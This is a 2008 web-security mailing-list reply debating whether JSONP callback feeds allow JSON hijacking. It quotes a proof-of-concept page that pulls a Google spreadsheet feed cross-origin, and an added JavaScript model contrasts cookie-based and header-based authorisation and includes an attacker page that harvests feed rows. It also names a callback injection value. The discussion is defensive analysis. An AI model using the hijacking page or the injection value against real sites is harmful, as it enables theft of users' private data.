Re: [WEB SECURITY] JSON Hijacking - Cross-browser issue
- From: kuza55 <kuza55@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] JSON Hijacking - Cross-browser issue
- Date: Fri, 15 Aug 2008 15:44:27 +1000
Sure, except this isn't really a vulnerability unless you can get
(what, from your post, looks like) the random id associated with the
spreadsheet, so to me this issue seems mitigated properly.
2008/8/15 application.secure application.secure <application.secure@xxxxxxxxx>:
> My conclusion is that the call-back pattern is insecure... Avoid the use of
> the call-back pattern.
>
> ----------------------------------------------------
> <html>
> <body>
> <script>
> // Callback named in the feed URL below; the server wraps the JSON feed in a
> // call to this function, so the including page receives the parsed data.
> function listEntries(json){
>   var ret = "";
>   for (var i = 0; i < json.feed.entry.length; i++) {
>     var entry = json.feed.entry[i];
>     ret += entry.title.$t;
>     ret += entry.content.$t;
>   }
>   alert(ret);
> }
> </script>
> <!-- cross-origin include of the feed as a script ("json-in-script") -->
> <script id="external_script"
> src="http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries"></script>
> </body>
> </html>
> ----------------------------------------------------
>
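An added example, not code from the thread or from Google's feed service, that models both positions above: the "json-in-script" endpoint the quoted post includes via `<script src>`, the attacker page that defines `listEntries`, and the two things that decide whether anything leaks (whether the feed key is guessable, and whether the server accepts a credential the browser attaches to any script load). Feed keys, tokens, the request shape and the feed rows are constructed for the example; `serveCookieAuth`, `serveHeaderAuth`, `attackerPage` and `ownerXhr` are hypothetical names.

```javascript
// Added example (not from the original thread). Models a JSONP / "json-in-script"
// feed endpoint and the attacker page from the quoted post. All keys, tokens,
// feed contents and the request object shape are constructed for illustration.

// Constructed sample feed, in the shape the post's listEntries() expects.
const FEEDS = {
  "k-0123456789abcdef": {              // constructed unguessable feed key
    owner: "victim-session",           // session cookie value of the owner
    token: "t-fe3d9a7c",               // constructed per-feed token, never stored in a cookie
    feed: {
      entry: [
        { title: { $t: "Q3 payroll" }, content: { $t: "alice 9000, bob 8500" } },
        { title: { $t: "Notes" },      content: { $t: "do not share" } },
      ],
    },
  },
};

// Only a plain JS identifier (optionally dotted) is accepted as the callback
// name, so the callback parameter cannot inject script into the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function wrapInCallback(callback, data) {
  if (!CALLBACK_RE.test(callback)) return null;
  return `${callback}(${JSON.stringify(data)});`;
}

// Endpoint A: authorises by session cookie only. The browser attaches cookies
// to <script src> loads, so a request triggered by the attacker's page in a
// logged-in victim's browser is indistinguishable from the owner's own page.
function serveCookieAuth(req) {
  const rec = FEEDS[req.query.key];
  if (!rec) return { status: 404, body: "" };
  if (req.cookies.session !== rec.owner) return { status: 403, body: "" };
  const body = wrapInCallback(req.query.callback, { feed: rec.feed });
  return body === null ? { status: 400, body: "" } : { status: 200, body };
}

// Endpoint B: requires a credential a third-party page cannot attach to a
// <script> include (here a custom header). A feed that is meant to be public
// can instead rely on its unguessable key alone, which is kuza55's point.
function serveHeaderAuth(req) {
  const rec = FEEDS[req.query.key];
  if (!rec) return { status: 404, body: "" };
  if (req.headers["x-feed-token"] !== rec.token) return { status: 403, body: "" };
  const body = wrapInCallback(req.query.callback, { feed: rec.feed });
  return body === null ? { status: 400, body: "" } : { status: 200, body };
}

// Attacker page: the equivalent of the post's <script src=...&callback=listEntries>.
// The response is executed as script with the attacker's listEntries in scope,
// which is exactly what the browser does for a cross-origin script include.
function attackerPage(server, key, callback = "listEntries") {
  const stolen = [];
  const res = server({
    query: { key, callback },
    cookies: { session: "victim-session" },  // sent automatically by the browser
    headers: {},                             // a <script> tag cannot set headers
  });
  if (res.status !== 200) return { status: res.status, stolen };
  const listEntries = (json) => {
    for (const e of json.feed.entry) stolen.push(`${e.title.$t}: ${e.content.$t}`);
  };
  new Function("listEntries", res.body)(listEntries);
  return { status: 200, stolen };
}

// The owner's own page fetches the feed with XMLHttpRequest and can set the
// header; being same-origin, it does not need the callback wrapper at all.
function ownerXhr(server, key) {
  return server({
    query: { key, callback: "listEntries" },
    cookies: { session: "victim-session" },
    headers: { "x-feed-token": FEEDS[key].token },
  });
}
```

`attackerPage(serveCookieAuth, "k-0123456789abcdef")` returns both rows, because the key is known and the cookie does the rest; with a guessed key it returns 404, and against `serveHeaderAuth` it returns 403 even with the right key. The `CALLBACK_RE` check is the separate, smaller issue with the pattern: without it, `callback=alert(1)//` turns the feed endpoint into a reflected script injection on the feed's own origin.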
----------------------------------------------------------------------------
Brought to you by http://www.webappsec.org